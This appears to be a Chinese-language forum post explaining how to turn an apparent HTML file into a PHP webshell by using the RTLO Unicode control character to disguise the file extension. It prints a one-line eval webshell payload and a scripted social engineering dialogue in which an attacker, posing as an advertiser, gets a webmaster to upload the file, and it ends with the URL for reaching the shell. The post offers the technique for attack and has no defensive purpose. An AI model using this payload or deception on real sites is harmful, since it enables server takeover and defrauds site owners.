HTML文件变为WEBSHELL

admin 10月前 180

测试环境:Linux+Apache+Php

Linux+Nginx+Php

HTML是没有办法充当一句话的,但是现在我们需要的就是把HTML变为PHP文件,这个可能实现吗?完全有可能!!!这里需要运用到RTLO技术,来进行欺骗,我个人认为目前这种方法适用于社会工程学攻击方面比较得体。

运用RTLO技术,我们已经把html.php变为了php.html,这样我们可以用于欺骗。如何欺骗?下面是虚构的一篇对话!当然方法不唯一!

===>攻击者事先把恶意代码放入HTML中(<?php @eval($_POST[‘sys’]);?>)

→攻击者:你是xxx的站长吗?我有一个小广告想挂在你的网站上面。

→站长:嗯,你好,我是xxx的站长。

→攻击者:站长,是这样的,我想先把一个HTML放进去,看看效果,如果效果不错,就可以付款,然后正式开始合作。

→站长:嗯,行,那你把HTML文件传过来吧。

→站长: www.xxx.com/php.html,你看看去吧,如果效果不错,我就去放置了。

其实这个时候php.html文件早以不存在了,而在linux下面它会这样显示?lmth.php,这样它就变为了一个可执行文件php,从而攻击者可以获取到webshell。

为了还原现场,我把已经运用RTLO技术的php.html上传到服务器,由于linux没有unicode控制符这么一说,所以linux会还原为lmth.php

攻击者从而就可以获取到webshell了,www.xxx.com/%3flmth.php。


最新回复 (0)
返回
发新帖